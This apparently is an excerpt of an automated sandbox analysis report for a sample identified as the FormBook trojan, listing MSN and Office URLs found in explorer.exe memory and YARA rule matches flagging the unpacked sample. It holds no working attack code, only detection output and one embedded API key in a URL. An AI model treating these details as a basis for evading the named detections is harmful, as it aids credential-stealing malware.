            Source: explorer.exe, 00000006.00000003.2288839218.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657136645.000000000703F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003585129.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076762687.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657463175.000000000704B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000006.00000003.2285166751.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005157734.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
            Source: explorer.exe, 00000006.00000002.4005157734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000006.00000002.4005157734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
            Source: explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
            Source: explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000006.00000003.2657529257.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2288001841.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077089186.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4008024188.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
            Source: explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.4011430051.00000000115F5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
